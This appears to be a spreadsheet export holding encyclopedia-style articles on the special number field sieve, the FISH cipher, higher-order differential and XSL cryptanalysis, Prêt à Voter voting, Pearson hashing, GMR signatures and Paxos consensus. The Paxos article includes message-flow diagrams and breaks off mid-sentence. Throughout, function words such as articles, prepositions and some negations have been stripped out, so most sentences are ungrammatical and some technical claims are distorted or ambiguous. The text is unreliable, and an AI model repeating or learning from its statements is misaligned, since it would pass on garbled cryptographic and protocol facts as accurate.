3^{479}+1=(4\times 158071\times 7167757\times 7759574882776161031)} times 197-digit composite number (the small factors removed ecm), snfs performed modulo 197-digit number. number relations required snfs still depends size large number, individual calculations quicker modulo smaller number. limitations algorithm this algorithm, mentioned above, efficient numbers form re±s, relatively small. also efficient integers represented polynomial small coefficients. this includes integers general form are±bsf, also many integers whose binary representation hamming weight. reason follows: number field sieve performs sieving different fields. first field usually rationals. second higher degree field. efficiency algorithm strongly depends norms certain elements fields. when integer represented polynomial small coefficients, norms arise much smaller arise integer represented general polynomial. reason general polynomial much larger coefficients, norms correspondingly larger. algorithm attempts factor norms fixed prime numbers. when norms smaller, numbers likely factor. also general number field sieve references further reading byrnes, steven (may 2005), "the number field sieve" (pdf), math lenstra, lenstra, jr.; manasse, pollard, (1993), "the factorization ninth fermat number", mathematics computation, (203): 319–349, bibcode:1993macom..61..319l, doi:10.1090/s0025-5718-1993-1182953-4 lenstra, lenstra, jr., eds. (1993), development number field sieve, lecture notes mathematics, vol. 1554, york: springer-verlag, isbn 978-3-540-57013-4 silverman, robert (2007), "optimal parameterization snfs", journal mathematical cryptology, (2): 105–124, citeseerx 10.1.1.12.2975, doi:10.1515/jmc.2007.007</t>
  </si>
  <si>
    <t>Quantum computing</t>
  </si>
  <si>
    <t>FISH (cipher)</t>
  </si>
  <si>
    <t>fish (fibonacci shrinking) stream cipher fast software based stream cipher using lagged fibonacci generators, plus concept shrinking generator cipher. published siemens 1993. fish quite fast software huge length. however, paper proposed pike, ross anderson showed fish broken thousand bits known plaintext. references blöcher, uwe; dichtl, markus (1994), "fish: fast software stream cipher", proc. fast software encryption 1993, lecture notes computer science, vol. 809, springer-verlag, 41–44, doi:10.1007/3-540-58108-1_4, isbn 978-3-540-58108-6. anderson, ross (1995), fibonacci keystream generators", proc. fast software encryption 1994, lecture notes computer science, vol. 1008, springer-verlag, 346–352, doi:10.1007/3-540-60590-8_26, isbn 978-3-540-60590-4.</t>
  </si>
  <si>
    <t>Higher-order differential cryptanalysis</t>
  </si>
  <si>
    <t>cryptography, higher-order differential cryptanalysis generalization differential cryptanalysis, attack used block ciphers. while standard differential cryptanalysis difference texts used, higher-order differential cryptanalysis studies propagation differences larger texts. xuejia lai, 1994, laid groundwork showing differentials special case general case higher order derivates. lars knudsen, year, able show concept higher order derivatives used mount attacks block ciphers. these attacks superior standard differential cryptanalysis. higher-order differential cryptanalysis notably used break kn-cipher, cipher previously proved immune standard differential cryptanalysis. higher-order derivatives block cipher maps {\displaystyle -bit strings {\displaystyle -bit strings can, fixed key, thought function {\displaystyle f:\mathbb _{2}^{n}\to \mathbb _{2}^{n}} standard differential cryptanalysis, interested finding pair input difference {\displaystyle \alpha output difference {\displaystyle \beta input texts difference {\displaystyle \alpha likely result output texts difference {\displaystyle \beta i.e., {\displaystyle f(m\oplus \alpha )\oplus f(m)=\beta true many {\displaystyle m\in \mathbb _{2}^{n}} note difference used usual case, though definitions difference possible. this motivates defining derivative function {\displaystyle f:\mathbb _{2}^{n}\to \mathbb _{2}^{n}} point {\displaystyle \alpha {\displaystyle \delta _{\alpha }f(x):=f(x\oplus \alpha )\oplus f(x)} using definition, {\displaystyle derivative {\displaystyle (\alpha _{1},\alpha _{2},\dots ,\alpha _{i})} recursively defined {\displaystyle \delta _{\alpha _{1},\alpha _{2},\dots ,\alpha _{i}}^{(i)}f(x):=\delta _{\alpha _{i}}\left(\delta _{\alpha _{1},\alpha _{2},\dots ,\alpha _{i-1}}^{i-1}f(x)\right)} thus example {\displaystyle \delta _{\alpha _{1},\alpha _{2}}^{(2)}f(x)=f(x)\oplus f(x\oplus \alpha _{1})\oplus f(x\oplus \alpha _{2})\oplus f(x\oplus \alpha _{1}\oplus \alpha _{2})} higher order derivatives defined many properties common ordinary derivative rule product rule. importantly also, taking derivative reduces algebraic degree function. higher-order differential attacks implement attack using higher order derivatives, knowledge probability distribution derivative cipher needed. calculating estimating distribution generally hard problem cipher question known algebraic degree, fact derivatives reduce degree used. example, cipher s-box function analysis) known algebraic degree order derivative must therefore, important cipher s-box function specific maximal close maximal) degree defy attack. cube attacks considered variant higher-order differential attacks. resistance higher-order differential attacks limitations higher-order differential attacks works small algebraic degree s-boxes small s-boxes. addition operations. also differential cryptanalysis kn-cipher cube attack references</t>
  </si>
  <si>
    <t>Prêt à Voter</t>
  </si>
  <si>
    <t>prêt voter voting system devised peter ryan university luxembourg. aims provide guarantees accuracy count ballot privacy independent software, hardware etc. assurance accuracy flows maximal transparency process, consistent maintaining ballot privacy. particular, prêt voter enables voters confirm vote accurately included count whilst avoiding dangers coercion vote buying. idea behind prêt voter approach encode vote using randomized candidate list. randomisation candidate list ballot form ensures secrecy vote. incidentally, also removes bias towards candidate occur fixed ordering. value printed bottom receipt extraction vote. buried cryptographically value information needed reconstruct candidate order extract vote encoded receipt. this information encrypted secret keys shared across number tellers. thus, tellers acting together able interpret vote encoded receipt. individual agent machine involved election ever able particular voter particular decrypted vote. after election, voters perhaps proxies acting behalf) visit bulletin board (wbb) confirm receipts appear correctly. once over, tellers take perform anonymising mixes decryption receipts. intermediate stages process posted audited later. there various auditing mechanisms ensure steps, creation ballot forms, mixing decryption performed correctly, carefully designed impinge ballot privacy. example suppose voter called anne. polling station, anne chooses, random, ballot form sealed envelope. example form shown below: booth, anne extracts ballot form envelope makes selection usual placing cross right-hand column candidate choice (or, case single transferable vote (stv) system example, marks ranking candidates). example, vote asterix given once selection made, separates left right hand strips along perforation discards left hand strip. left right hand strip constitutes privacy protected receipt, shown table anne exits booth clutching receipt, registers official, casts receipt. receipt placed optical reader similar device records random value bottom strip records cell marked. original paper receipt digitally signed franked, returned keep. note candidate list removed scanning, machine reads ballot paper never learns content vote. this prevents (intentional unintentional) violation vote privacy scanning equipment. origin prêt voter inspired earlier, voter-verifiable scheme david chaum. replaces visual cryptographic encoding voter's choice chaum's scheme conceptually technologically simpler candidate randomization. prêt voter idea encoding vote permutations subsequently incorporated chaum's punchscan scheme. however punchscan uses permutation indirection symbols instead candidate names allowing comply voting laws require specific ordering candidates. first implementation prêt voter, team university surrey, best design, overall second place 2007 university voting systems competition, winning team, punchscan, uncovered security flaw random number generator portion prêt voter source code past development epsrc-funded project, trustworthy voting systems, april 2009 april 2014, aimed enhance design prêt voter various ways, build full prototype implementation, produce mathematical proofs claimed security properties prêt voter. project james heather steve schneider university surrey, mark ryan university birmingham; close collaboration fnr-funded sertvs project peter ryan university luxembourg. current development there appears development since 2014. their domains expired 2015. security analysis there different studies done, mostly concluding system secure "remarkably robust", despite possible attack vectors. references external links accessible account prêt voter found "the computer vote", chapter appear formal methods: state directions, paul boca, springer 2007, also available newcastle university technical report [1]. further technical details found newcastle university technical reports 864, 880, 929, 965, prêt voter site</t>
  </si>
  <si>
    <t>XSL attack</t>
  </si>
  <si>
    <t>cryptography, extended sparse linearization (xsl) attack method cryptanalysis block ciphers. attack first published 2002 researchers nicolas courtois josef pieprzyk. caused controversy claimed potential break advanced encryption standard (aes) cipher, also known rijndael, faster exhaustive search. since already widely used commerce government transmission secret information, finding technique shorten amount time takes retrieve secret message without could wide implications. method high work-factor, unless lessened, means technique reduce effort break comparison exhaustive search. therefore, affect real-world security block ciphers near future. nonetheless, attack caused experts express greater unease algebraic simplicity current aes. overview, attack relies first analyzing internals cipher deriving system quadratic simultaneous equations. these systems equations typically large, example 8,000 equations 1,600 variables 128-bit aes. several methods solving systems known. attack, specialized algorithm, termed extended sparse linearization, applied solve equations recover key. attack notable requiring handful known plaintexts perform; previous methods cryptanalysis, linear differential cryptanalysis, often require unrealistically large numbers known chosen plaintexts. solving multivariate quadratic equations solving multivariate quadratic equations (mq) finite numbers np-hard problem general case) several applications cryptography. attack requires efficient algorithm tackling 1999, kipnis shamir showed particular public algorithm, known hidden field equations scheme (hfe), could reduced overdetermined system quadratic equations (more equations unknowns). technique solving systems linearization, involves replacing quadratic term independent variable solving resultant linear system using algorithm gaussian elimination. succeed, linearization requires enough linearly independent equations (approximately many number terms). however, cryptanalysis equations, kipnis shamir proposed re-linearization, technique extra non-linear equations added linearization, resultant system solved second application linearization. re-linearization proved general enough applicable schemes. 2000, courtois proposed improved algorithm known (for extended linearization), increases number equations multiplying monomials certain degree. complexity estimates showed attack would work equations derived block ciphers aes. however, systems equations produced special structure, algorithm developed refinement could take advantage structure. xsl, equations multiplied carefully selected monomials, several variants proposed. research efficiency derivative algorithms remains ongoing (yang chen, 2004). application block ciphers courtois pieprzyk (2002) observed (rijndael) partially also serpent could expressed system quadratic equations. variables represent plaintext, ciphertext bits, also various intermediate values within algorithm. s-box appears especially vulnerable type analysis, based algebraically simple inverse function. subsequently, ciphers studied systems equations produced (biryukov cannière, 2003), including camellia, khazad, misty1 kasumi. unlike forms cryptanalysis, differential linear cryptanalysis, known plaintexts required. algorithm tailored solve type equation systems produced. courtois pieprzyk estimate "optimistic evaluation shows attack might able break rijndael [with] bits serpent lengths [of] bits." their analysis, however, universally accepted. example: believe courtois–pieprzyk work flawed. they overcount number linearly independent equations. result fact enough linear equations solve system, method break rijndael… method merit, worth investigating, break rijndael stands. conference, bonn 2004, inventors rijndael, vincent rijmen, commented, "the attack attack. dream." promptly courtois answered, "xsl dream. also dream turn nightmare." however neither later paper actions nist give support remark courtois. 2003, murphy robshaw discovered alternative description aes, embedding larger cipher called "bes", described using simple operations single field, gf(28). attack mounted system yields simpler equations would break complexity around 2100, courtois pieprzyk analysis correct. 2005 leurent gave evidence that, proposed form, algorithm provide efficient method solving system equations; however courtois disputed findings. 2007, chu-wee khoongming khoo showed cannot possibly work presented.even works modern algorithms, attack currently poses little danger terms practical security. like many modern cryptanalytic results, would so-called "certificational weakness": faster brute force attack, resources required still huge, unlikely real-world systems could compromised using future improvements could increase practicality attack, however. because type attack unexpected, cryptographers expressed unease algebraic simplicity ciphers like rijndael. bruce schneier niels ferguson write, criticism aes: quite trust security… what concerns simple algebraic structure… block cipher know simple algebraic representation. idea whether leads attack not, knowing reason enough skeptical aes." (practical cryptography, 2003, 56–57) references biryukov, alex; cannière, christophe (2003). "block ciphers systems quadratic equations". johansson, thomas (ed.). fast software encryption, 10th international workshop, 2003, lund, sweden, february 24-26, 2003, revised papers. lecture notes computer science. vol. 2887. springer. 274–289. doi:10.1007/978-3-540-39887-5_21. courtois, nicolas klimov, alexander; patarin, jacques; shamir, (2000). "efficient algorithms solving overdefined systems multivariate polynomial equations" (pdf). preneel, bart (ed.). advances cryptology eurocrypt 2000, international conference theory application cryptographic techniques, bruges, belgium, 14-18, 2000, proceeding. lecture notes computer science. vol. 1807. springer. 392–407. doi:10.1007/3-540-45539-6_27. courtois, nicolas pieprzyk, josef (2002). "cryptanalysis block ciphers overdefined systems equations". zheng, yuliang (ed.). advances cryptology asiacrypt 2002, international conference theory application cryptology information security, queenstown, zealand, december 1-5, 2002, proceedings. lecture notes computer science. vol. 2501. springer. 267–287. doi:10.1007/3-540-36178-2_17. kipnis, aviad; shamir, (1999). "cryptanalysis public cryptosystem relinearization". wiener, michael (ed.). advances cryptology crypto '99, 19th annual international cryptology conference, santa barbara, california, usa, august 15-19, 1999, proceedings. lecture notes computer science. vol. 1666. springer. 19–30. doi:10.1007/3-540-48405-1_2. lim, chu-wee; khoo, khoongming (2007). analysis applied bes". biryukov, alex (ed.). fast software encryption, 14th international workshop, 2007, luxembourg, luxembourg, march 26-28, 2007, revised selected papers. lecture notes computer science. vol. 4593. springer. 242–253. doi:10.1007/978-3-540-74619-5_16. dana mackenzie (2003). game chance". scientist. (2398): murphy, sean; robshaw, matthew (2002). "essential algebraic structure within aes". yung, moti (ed.). advances cryptology crypto 2002, 22nd annual international cryptology conference, santa barbara, california, usa, august 18-22, 2002, proceedings. lecture notes computer science. vol. 2442. springer. 1–16. doi:10.1007/3-540-45708-9_1. murphy, robshaw comments security technique. yang, bo-yin; chen, jiun{-}ming (2004). "theoretical analysis small fields". wang, huaxiong; pieprzyk, josef; varadharajan, vijay (eds.). information security privacy: australasian conference, acisp 2004, sydney, australia, july 13-15, 2004. proceedings. lecture notes computer science. vol. 3108. springer. 277–288. doi:10.1007/978-3-540-27800-9_24. cid, carlos; leurent, gaëtan (2005). analysis algorithm". roy, bimal (ed.). advances cryptology asiacrypt 2005, 11th international conference theory application cryptology information security, chennai, india, december 4-8, 2005, proceedings. lecture notes computer science. vol. 3788. springer. 333–352. doi:10.1007/11593447_18. diem, claus (2004). "the xl-algorithm conjecture commutative algebra". lee, joong (ed.). advances cryptology asiacrypt 2004, 10th international conference theory application cryptology information security, jeju island, korea, december 5-9, 2004, proceedings. lecture notes computer science. vol. 3329. springer. 323–337. doi:10.1007/978-3-540-30539-2_23. external links courtois' page "quadratic cryptanalysis", explanation attack savard "aes broken" courtois pieprzyk paper eprint commentary crypto-gram newsletter: [1], [2], [3]. overview</t>
  </si>
  <si>
    <t>Pearson hashing</t>
  </si>
  <si>
    <t>pearson hashing hash function designed fast execution processors 8-bit registers. given input consisting number bytes, produces output single byte strongly dependent every byte input. implementation requires instructions, plus 256-byte lookup table containing permutation values 255.this hash function cbc-mac uses 8-bit substitution cipher implemented substitution table. 8-bit cipher negligible cryptographic security, pearson hash function cryptographically strong, useful implementing hash tables data integrity check code, purposes offers benefits: extremely simple. executes quickly resource-limited processors. there simple class inputs collisions (identical outputs) especially likely. given small, privileged inputs (e.g., reserved words compiler), permutation table adjusted inputs yield distinct hash values, producing called perfect hash function. input strings differing exactly character never collide. e.g., applying algorithm strings never produce value.one drawbacks compared hashing algorithms designed 8-bit processors suggested byte lookup table, prohibitively large small microcontroller program memory size order hundreds bytes. workaround simple permutation function instead table stored program memory. however, using simple function, t[i] 255-i, partly defeats usability hash function anagrams result hash value; using complex function, hand, affect speed negatively. using function rather table also allows extending block size. such functions naturally bijective, like table variants. algorithm described following pseudocode, computes hash message using permutation table algorithm pearson hashing loop loop return hash variable initialized differently, e.g. length data modulo 256; particular choice used python implementation example below. example implementations python, 8-bit output 'table' parameter requires pseudo-randomly shuffled list range [0..255]. this easily generated using python's builtin range function using random.shuffle permutate 8-bit also non-cryptographic hash functions references</t>
  </si>
  <si>
    <t>MSZ96</t>
  </si>
  <si>
    <t>msz96 quantum distribution protocol allows cryptographic encoded using four nonorthogonal quantum states described non-commuting quadrature phase amplitudes weak optical field, without photon polarization (bb84 protocol) entangled photons (e91 protocol). references</t>
  </si>
  <si>
    <t>Quantum computers</t>
  </si>
  <si>
    <t>GMR (cryptography)</t>
  </si>
  <si>
    <t>cryptography, digital signature algorithm named inventors shafi goldwasser, silvio micali rivest. security system related difficulty factoring large numbers. but, contrast rsa, secure adaptive chosen-message attacks even attacker receives signatures messages choice, allow forge signature single additional message. external links digital signature scheme secure against adaptive chosen-message attacks shafi goldwasser, silvio micali, ronald rivest</t>
  </si>
  <si>
    <t>Balanced boolean function</t>
  </si>
  <si>
    <t>mathematics computer science, balanced boolean function boolean function whose output yields many input set. this means uniformly random input string bits, probability getting 1/2. examples balanced boolean functions function copies first input output, function produces exclusive input bits. usage balanced boolean functions primarily used cryptography. function balanced, statistical bias, making subject cryptanalysis correlation attack. also bent function references balanced boolean functions evaluated every input unlikely read, annual symposium theory computing</t>
  </si>
  <si>
    <t>Paxos (computer science)</t>
  </si>
  <si>
    <t>paxos family protocols solving consensus network unreliable fallible processors. consensus process agreeing result among group participants. this problem becomes difficult participants communications experience failures.consensus protocols basis state machine replication approach distributed computing, suggested leslie lamport surveyed fred schneider. state machine replication technique converting algorithm fault-tolerant, distributed implementation. ad-hoc techniques leave important cases failures unresolved. principled approach proposed lamport ensures cases handled safely. paxos protocol first submitted 1989 named fictional legislative consensus system used paxos island greece, lamport wrote parliament function "even though legislators continually wandered parliamentary chamber". later published journal article 1998.the paxos family protocols includes spectrum trade-offs number processors, number message delays learning agreed value, activity level individual participants, number messages sent, types failures. although deterministic fault-tolerant consensus protocol guarantee progress asynchronous network result proved paper fischer, lynch paterson), paxos guarantees safety (consistency), conditions could prevent making progress difficult provoke. paxos usually used durability required (for example, replicate file database), amount durable state could large. protocol attempts make progress even periods bounded number replicas unresponsive. there also mechanism drop permanently failed replica replica. history topic predates protocol. 1988, lynch, dwork stockmeyer demonstrated solvability consensus broad family "partially synchronous" systems. paxos strong similarities protocol used agreement "viewstamped replication", first published liskov 1988, context distributed transactions. notwithstanding prior work, paxos offered particularly elegant formalism, included earliest proofs safety fault-tolerant distributed consensus protocol. reconfigurable state machines strong ties prior work reliable group multicast protocols support dynamic group membership, example birman's work 1985 1987 virtually synchronous gbcast protocol. however, gbcast unusual supporting durability addressing partitioning failures. most reliable multicast protocols lack properties, required implementations state machine replication model. this point elaborated paper lamport, malkhi zhou.paxos protocols members theoretical class solutions problem formalized uniform agreement crash failures. lower bounds problem proved keidar shraer. derecho, software library cloud-scale state machine replication, offers paxos protocol integrated self-managed virtually synchronous membership. this protocol matches keidar shraer optimality bounds, maps efficiently modern remote (rdma) datacenter hardware (but uses rdma available). assumptions order simplify presentation paxos, following assumptions definitions made explicit. techniques broaden applicability known literature, covered article. processors processors operate arbitrary speed. processors experience failures. processors stable storage re-join protocol failures (following crash-recovery failure model). processors collude, lie, otherwise attempt subvert protocol. (that byzantine failures occur. byzantine paxos solution tolerates failures arise arbitrary/malicious behavior processes.) network processors send messages processor. messages sent asynchronously take arbitrarily long deliver. messages lost, reordered, duplicated. messages delivered without corruption. (that byzantine failures occur. byzantine paxos solution tolerates corrupted messages arise arbitrary/malicious behavior messaging channels.) number processors general, consensus algorithm make progress using {\displaystyle n=2f+1} processors, despite simultaneous failure {\displaystyle processors: words, number non-faulty processes must strictly greater number faulty processes. however, using reconfiguration, protocol employed survives number total failures long fail simultaneously. paxos protocols, reconfigurations handled separate configurations. roles paxos describes actions processors roles protocol: client, acceptor, proposer, learner, leader. typical implementations, single processor play roles time. this affect correctness protocol—it usual coalesce roles improve latency and/or number messages protocol. client client issues request distributed system, waits response. instance, write request file distributed file server. acceptor (voters) acceptors fault-tolerant "memory" protocol. acceptors collected groups called quorums. message sent acceptor must sent quorum acceptors. message received acceptor ignored unless copy received acceptor quorum. proposer proposer advocates client request, attempting convince acceptors agree acting coordinator move protocol forward conflicts occur. learner learners replication factor protocol. once client request agreed upon acceptors, learner take action (i.e.: execute request send response client). improve availability processing, additional learners added. leader paxos requires distinguished proposer (called leader) make progress. many processes believe leaders, protocol guarantees progress eventually chosen. processes believe leaders, stall protocol continuously proposing conflicting updates. however, safety properties still preserved case. quorums quorums express safety consistency) properties paxos ensuring least surviving processor retains knowledge results. quorums defined subsets acceptors quorums share least member. typically, quorum majority participating acceptors. example, given acceptors {a,b,c,d}, majority quorum would three acceptors: {a,b,c}, {a,c,d}, {a,b,d}, {b,c,d}. more generally, arbitrary positive weights assigned acceptors; case, quorum defined subset acceptors summary weight greater half total weight acceptors. proposal number agreed value each attempt define agreed value performed proposals accepted acceptors. each proposal uniquely numbered given proposer. e.g., proposal form unique identifier proposal actual proposed value. value corresponding numbered proposal computed part running paxos protocol, need safety liveness properties order guarantee safety (also called "consistency"), paxos defines three properties ensures first always held, regardless pattern failures: validity non-triviality) only proposed values chosen learned. agreement consistency, safety) distinct learners learn different values can't decided value) termination liveness) value proposed, eventually learner learn value sufficient processors remain non-faulty).note paxos guaranteed terminate, thus liveness property. this supported fischer lynch paterson impossibility result (flp) states consistency protocol safety, liveness, fault tolerance. paxos's point ensure fault tolerance guarantees safety, cannot also guarantee liveness. typical deployment deployments paxos, participating process acts three roles; proposer, acceptor learner. this reduces message complexity significantly, without sacrificing correctness: paxos, clients send commands leader. during normal operation, leader receives client's command, assigns command number {\displaystyle begins {\displaystyle instance consensus algorithm sending messages acceptor processes. merging roles, protocol "collapses" efficient client-master-replica style deployment, typical database community. benefit paxos protocols (including implementations merged roles) guarantee safety properties. typical implementation's message flow covered section multi-paxos. basic paxos this protocol basic paxos family. each "instance" "execution") basic paxos protocol decides single output value. protocol proceeds several rounds. successful round phases: phase (which divided parts phase (which divided parts description phases. remember assume asynchronous model, e.g. processor phase another processor another. phase phase prepare proposer creates message, call "prepare", identified number note value proposed maybe agreed number uniquely identifies initial message proposer sent acceptors). number must greater number used previous prepare messages proposer. then, sends prepare message containing least quorum acceptors. note prepare message contains number (that contain e.g. proposed value, often denoted proposer decides quorum. proposer initiate paxos cannot communicate least quorum acceptors. phase promise acceptors waits prepare message proposers. acceptor receives prepare message, acceptor must look identifier number received prepare message. there cases.if higher every previous proposal number received, proposers, acceptor, acceptor must return message, call "promise", proposer, ignore future proposals number less acceptor accepted proposal point past, must include previous proposal number, corresponding accepted value, response proposer.otherwise (that less equal previous proposal number received proposer acceptor) acceptor ignore received proposal. answer case paxos work. however, sake optimization, sending denial (nack) response would tell proposer stop attempt create consensus proposal phase phase accept proposer receives promises quorum acceptors, needs value proposal. acceptors previously accepted proposal, they'll sent values proposer, must value proposal, value associated highest proposal number reported acceptors, let's call none acceptors accepted proposal point, proposer choose value originally wanted propose, x.the proposer sends accept message, quorum acceptors chosen value proposal, proposal number (which number contained prepare message previously sent acceptors). accept message either v=z) case none acceptors previously accepted value, v=x).this accept message interpreted "request", "accept proposal, please!". phase accepted acceptor receives accept message, proposer, must accept already promised phase paxos protocol) consider proposals identifier greater n.if acceptor already promised phase consider proposals identifier greater register value received accept message) accepted value protocol), send accepted message proposer every learner (which typically proposers themselves).else, ignore accept message request.note consensus achieved majority acceptors accept identifier number (rather value). because identifier unique proposer value proposed identifier, acceptors accept identifier thereby accept value. these facts result counter-intuitive scenarios impact correctness: acceptors accept multiple values, value achieve majority across acceptors (with different identifiers) later changed, acceptors continue accept proposals identifier achieved majority. however, paxos protocol guarantees consensus permanent chosen value immutable. when rounds fail rounds fail multiple proposers send conflicting prepare messages, proposer receive quorum responses (promise accepted). cases, another round must started higher proposal number. paxos used select leader notice proposer paxos could propose leader," (or, example, "proposer leader"). because agreement validity guarantees paxos, accepted quorum, proposer known leader nodes. this satisfies needs leader election single node believing leader single node known leader times. graphic representation flow messages basic paxos following diagrams represent several cases/situations application basic paxos protocol. some cases show basic paxos protocol copes failure certain (redundant) components distributed system. note values returned promise message "null" first time proposal made (since acceptor accepted value round). basic paxos without failures diagram below, client, proposer, acceptors (i.e. quorum size learners (represented vertical lines). this diagram represents case first round, successful (i.e. process network fails). here, last (va, vc). error cases basic paxos simplest error cases failure acceptor (when quorum acceptors remains alive) failure redundant learner. cases, protocol requires "recovery" (i.e. still succeeds): additional rounds messages required, shown next diagrams/cases). basic paxos acceptor fails following diagram, acceptors quorum fails, quorum size becomes case, basic paxos protocol still succeeds. client proposer acceptor learner x--------&gt;| request x---------&gt;|-&gt;|-&gt;| prepare(1) fail |&lt;---------x--x promise(1,{va, null}) x---------&gt;|-&gt;| accept!(1,v) |&lt;---------x--x---------&gt;|-&gt;| accepted(1,v) |&lt;---------------------------------x--x response basic paxos redundant learner fails following case, (redundant) learners fails, basic paxos protocol still succeeds. client proposer acceptor learner x--------&gt;| request x---------&gt;|-&gt;|-&gt;| prepare(1) |&lt;---------x--x--x promise(1,{va,vb,vc}) x---------&gt;|-&gt;|-&gt;| accept!(1,v) |&lt;---------x--x--x------&gt;|-&gt;| accepted(1,v) fail |&lt;---------------------------------x response basic paxos proposer fails case, proposer fails proposing value, agreement reached. specifically, fails middle accept message, acceptor quorum receives value. meanwhile, leader proposer) elected (but shown detail). note rounds case (rounds proceed vertically, bottom). client proposer acceptor learner x-----&gt;| request x------------&gt;|-&gt;|-&gt;| prepare(1) |&lt;------------x--x--x promise(1,{va, vc}) leader fails broadcast x------------&gt;| accept!(1,v) leader x---------&gt;|-&gt;|-&gt;| prepare(2) |&lt;---------x--x--x promise(2,{v, null, null}) x---------&gt;|-&gt;|-&gt;| accept!(2,v) |&lt;---------x--x--x------&gt;|-&gt;| accepted(2,v) |&lt;---------------------------------x--x response basic paxos multiple proposers conflict complex case multiple proposers believe leaders. instance, current leader fail later recover, proposers already re-selected leader. recovered leader learned attempts begin round conflict current leader. diagram below, unsuccessful rounds shown, could suggested bottom diagram). client proposer acceptor learner x-----&gt;| request x------------&gt;|-&gt;|-&gt;| prepare(1) |&lt;------------x--x--x promise(1,{null,null,null}) leader fails leader (knows last number x---------&gt;|-&gt;|-&gt;| prepare(2) |&lt;---------x--x--x promise(2,{null,null,null}) leader recovers leader tries denied x------------&gt;|-&gt;|-&gt;| prepare(2) |&lt;------------x--x--x nack(2) leader tries x------------&gt;|-&gt;|-&gt;| prepare(3) |&lt;------------x--x--x promise(3,{null,null,null}) leader proposes, denied x---------&gt;|-&gt;|-&gt;| accept!(2,va) |&lt;---------x--x--x nack(3) leader tries x---------&gt;|-&gt;|-&gt;| prepare(4) |&lt;---------x--x--x promise(4,{null,null,null}) leader proposes, denied x------------&gt;|-&gt;|-&gt;| accept!(3,vb) |&lt;------------x--x--x nack(4) basic paxos acceptor accepts different values following case, proposer achieves acceptance value acceptor failing. proposer prepares acceptors never accepted allowing propose then accepted acceptors, including initially accepted proposer acceptor learner x---------&gt;|-&gt;|-&gt;| prepare(1) |&lt;---------x--x--x promise(1,{null,null,null}) x---------&gt;| accept!(1,v1) x------------&gt;|-&gt;| accepted(1,v1) fail x---------&gt;|-&gt;| prepare(2) |&lt;---------x--x promise(2,{null,null}) x------&gt;|-&gt;|-&gt;| accept!(2,v2) |&lt;------x--x--x------&gt;|-&gt;| accepted(2,v2) basic paxos multi-identifier majority insufficient following case, proposer achieves acceptance value acceptor failing. proposer prepares acceptors never accepted allowing propose this proposer able acceptor accept failing. proposer finds majority includes acceptor accepted must propose proposer manages acceptors accept failing. point, three acceptors accepted identifier. finally, proposer prepares majority seen largest accepted identifier. value associated largest identifier majority must propose this proposer gets acceptors accept achieving consensus. proposer acceptor learner x---------------&gt;|-&gt;|-&gt;|-&gt;|-&gt;| prepare(1) |&lt;---------------x--x--x--x--x promise(1,{null,null,null,null,null}) x---------------&gt;| accept!(1,v1) x------------------&gt;|-&gt;| accepted(1,v1) fail x---------------&gt;|-&gt;|-&gt;|-&gt;| prepare(2) |&lt;---------------x--x--x--x promise(2,{null,null,null,null}) x---------------&gt;| accept!(2,v2) x---------------&gt;|-&gt;| accepted(2,v2) fail x---------&gt;|----&gt;|-&gt;|-&gt;| prepare(3) |&lt;------------x--x--x--x promise(3,{v1,null,null,null}) x---------------&gt;|-&gt;| accept!(3,v1) x--x---------&gt;|-&gt;| accepted(3,v1) fail x------&gt;|-&gt;|-------&gt;| prepare(4) |&lt;------x--x--|--|--x promise(4,{v1(1),v2(2),null}) x------&gt;|-&gt;|-&gt;|-&gt;|-&gt;| accept!(4,v2) x--x--x--x--x------&gt;|-&gt;| accepted(4,v2) basic paxos proposers cannot change existing consensus following case, proposer achieves acceptance value acceptors failing. proposer start another round, impossible proposer prepare majority include least acceptor accepted such, even though proposer existing consensus, proposer's option propose value already agreed upon. proposers continually increase identifier restart process, consensus never changed. proposer acceptor learner x---------&gt;|-&gt;|-&gt;| prepare(1) |&lt;---------x--x--x promise(1,{null,null,null}) x---------&gt;|-&gt;| accept!(1,v1) x--x---------&gt;|-&gt;| accepted(1,v1) fail x---------&gt;|-&gt;| prepare(2) |&lt;---------x--x promise(2,{v1,null}) x------&gt;|-&gt;|-&gt;| accept!(2,v1) |&lt;------x--x--x------&gt;|-&gt;| accepted(2,v1) multi-paxos typical deployment paxos requires continuous stream agreed values acting commands distributed state machine. command result single instance basic paxos protocol, significant amount overhead would result. leader relatively stable, phase becomes unnecessary. thus, possible skip phase future instances protocol leader. achieve this, round number included along value incremented round leader. multi-paxos reduces failure-free message delay (proposal learning) delays delays. graphic representation flow messages multi-paxos multi-paxos without failures following diagram, instance "execution") basic paxos protocol, initial leader proposer), shown. note multi-paxos consists several instances basic paxos protocol. client proposer acceptor learner first request x--------&gt;| request x---------&gt;|-&gt;|-&gt;| prepare(n) |&lt;---------x--x--x promise(n,i,{va,vb,vc}) x---------&gt;|-&gt;|-&gt;| accept!(n,i,v) |&lt;---------x--x--x------&gt;|-&gt;| accepted(n,i,v) |&lt;---------------------------------x--x response last (va, vc). multi-paxos phase skipped case, subsequent instances basic paxos protocol (represented i+1) leader, phase subsequent instances basic paxos protocol), consist prepare promise sub-phases, skipped. note leader stable, i.e. crash change. client proposer acceptor learner following requests x--------&gt;| request x---------&gt;|-&gt;|-&gt;| accept!(n,i+1,w) |&lt;---------x--x--x------&gt;|-&gt;| accepted(n,i+1,w) |&lt;---------------------------------x--x response multi-paxos roles collapsed common deployment multi-paxos consists collapsing role proposers, acceptors learners "servers". end, "clients" "servers". following diagram represents first "instance" basic paxos protocol, roles proposer, acceptor learner collapsed single role, called "server". client servers first request x--------&gt;| request x-&gt;|-&gt;| prepare(n) |&lt;-x--x promise(n, {va, vb}) x-&gt;|-&gt;| accept!(n, x&lt;&gt;x&lt;&gt;x accepted(n, |&lt;--------x response multi-paxos roles collapsed leader steady subsequent instances basic paxos protocol, leader previous instances basic paxos protocol, phase skipped. client servers x--------&gt;| request x-&gt;|-&gt;| accept!(n,i+1,w) x&lt;&gt;x&lt;&gt;x accepted(n,i+1) |&lt;--------x response optimisations number optimisations performed reduce number exchanged messages, improve performance protocol, etc. optimisations reported below. save messages cost extra message delay single distinguished learner informs learners finds value chosen. acceptors send accepted messages distinguished learner. applications, roles leader distinguished learner performed processor."a leader send prepare accept! messages quorum acceptors. long acceptors quorum working communicate leader learners, need acceptors quorum anything."acceptors care value chosen. they simply respond prepare accept! messages ensure that, despite failures, single value chosen. however, acceptor learn value chosen, store value stable storage erase information saved there. acceptor later receives prepare accept! message, instead performing phase1b phase2b action, simply inform leader chosen value."instead sending value leader send hash acceptors accept! messages. learner learn chosen receives accepted messages either hash quorum acceptors, least messages contains rather hash. however, leader could receive promise messages tell hash value must phase2a action without telling actual value happens, leader cannot execute 